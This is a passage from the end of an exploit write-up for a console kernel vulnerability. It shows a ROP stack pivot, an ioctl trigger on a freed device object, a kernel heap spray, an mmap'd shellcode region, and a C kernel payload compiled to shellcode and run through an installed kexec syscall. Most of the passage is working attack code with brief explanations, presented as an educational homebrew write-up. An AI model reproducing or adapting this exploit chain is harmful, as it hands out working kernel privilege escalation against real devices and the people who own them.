kchain.push(window.gadgets["pop rsp"]);
kchain.push(window.gadgets["push rax; jmp rcx"]);
Now we need to trigger the exploit by calling the ioctl() system call on our object. The second parameter (cmd) does not matter because the handler will never be reached, as we have overwritten it with our stack pivot gadget.
p.syscall('sys_ioctl', p.read8(targetDevFd), 0x81200000, obj_cdev_priv);
Finally, we need to ensure the object doesn't get corrupted. The cdev_priv object is global, meaning other processes will go to use it at some point. Since we free()'d its backing memory, some other allocation could steal this pointer and overwrite our faked object, causing unpredictable crashes. To avoid this, we can call malloc() in the kernel a bunch of times to try to obtain this pointer. Essentially we are performing a second heap spray, but if we find the address we want, we keep the allocation.
Since the kernel payload needs to retrieve the address of the object to write to, we will store it at an absolute address, 0xDEAD0000. We will also use this mapping to execute our payload.
var baseAddressExecute = new int64(0xDEAD0000, 0);
var exploitExecuteAddress = p.syscall("sys_mmap", baseAddressExecute, 0x10000, 7, 0x1000, -1, 0);
var executeSegment = new memory(p, exploitExecuteAddress);
var objBaseStore = executeSegment.allocate(0x8);
var shellcode = executeSegment.allocate(0x200);
p.write8(objBaseStore, objBase);
We will also apply a few of our other patches to the object, such as restoring the object's name and original si_devsw pointer.
int main(void)
{
int i;
void *addr;
uint8_t *ptrKernel;
int (*printf)(const char *fmt, ...) = NULL;
void *(*malloc)(unsigned long size, void *type, int flags) = NULL;
void (*free)(void *addr, void *type) = NULL;
// Get kbase and resolve kernel symbols
ptrKernel = (uint8_t *)(rdmsr(0xc0000082) - KERN_XFAST_SYSCALL);
malloc = (void *)&ptrKernel[KERN_MALLOC];
free = (void *)&ptrKernel[KERN_FREE];
printf = (void *)&ptrKernel[KERN_PRINTF];
uint8_t *objBase = (uint8_t *)(*(uint64_t *)(0xDEAD0000));
// Fix stuff in object that's corrupted by exploit
*(uint64_t *)(objBase + 0x0E0) = 0x7773706964;
*(uint64_t *)(objBase + 0x0F0) = 0;
*(uint64_t *)(objBase + 0x0F8) = 0;
// Malloc so object doesn't get smashed
for (i = 0; i < 512; i++)
{
addr = malloc(0x180, &ptrKernel[0x133F680], 0x02);
printf("Alloc: 0x%lx\n", addr);
if (addr == (void *)objBase)
break;
free(addr, &ptrKernel[0x133F680]);
}
printf("Object Dump 0x%lx\n", objBase);
for (i = 0; i < 0x180; i += 8)
printf("<Debug> Object + 0x%03x: 0x%lx\n", i, *(uint64_t *)(*(uint64_t *)(0xDEAD0000) + i));
// EE :)
return 0;
}
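The constant 0x7773706964 written to offset 0x0E0 in the payload above is just the device name packed as a little-endian integer. A small sketch of the decoding, using a made-up helper name:

```javascript
// Hypothetical helper: read ASCII characters from a little-endian integer,
// lowest byte first, until no bytes remain.
function qwordToAscii(value) {
  let out = "";
  for (let v = BigInt(value); v !== 0n; v >>= 8n) {
    out += String.fromCharCode(Number(v & 0xFFn));
  }
  return out;
}

console.log(qwordToAscii(0x7773706964n)); // dipsw
```

The upper three bytes of the 8-byte write are zero, so the string is NUL-terminated in place.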
This payload was then compiled and converted into shellcode, which is executed via the kexec() system call we installed earlier.
var stage7 = new rop(p, undefined);
p.write4(shellcode.add32(0x00000000), 0x00000be9);
p.write4(shellcode.add32(0x00000004), 0x90909000);
p.write4(shellcode.add32(0x00000008), 0x90909090);
// ... [omitted for readability]
stage7.push(window.gadgets["pop rax"]);
stage7.push(11);
stage7.push(window.gadgets["pop rdi"]);
stage7.push(shellcode);
stage7.push(libkernel.add32(0x29CA)); // "syscall" gadget
stage7.run();
This exploit is quite an interesting one, though it did require a lot of guessing and would have been a lot more fun to work on had I had a proper kernel debugger. Finding a working object can be a long and grueling process depending on the leak you're using. Overall this exploit is incredibly stable; in fact, I ran it over 30 times and neither WebKit nor the kernel crashed once. I learned a lot from implementing it, and I hope this write-up helps others like myself who are interested in exploitation.
- CTurt
- Flatz
- qwertyoruiopz
- other anonymous contributors
See any issues I glanced over? Open an issue or send me a tweet and let me know :)